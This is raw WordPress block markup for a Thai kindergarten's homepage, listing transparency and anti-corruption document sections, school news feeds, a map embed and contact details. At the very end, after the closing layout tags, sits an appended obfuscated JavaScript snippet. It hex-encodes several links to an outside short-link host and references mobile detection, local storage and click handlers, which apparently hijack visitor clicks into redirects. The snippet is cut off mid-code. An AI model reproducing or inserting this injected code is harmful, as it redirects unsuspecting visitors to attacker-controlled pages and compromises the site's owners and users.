{\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_d11eed-26\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const 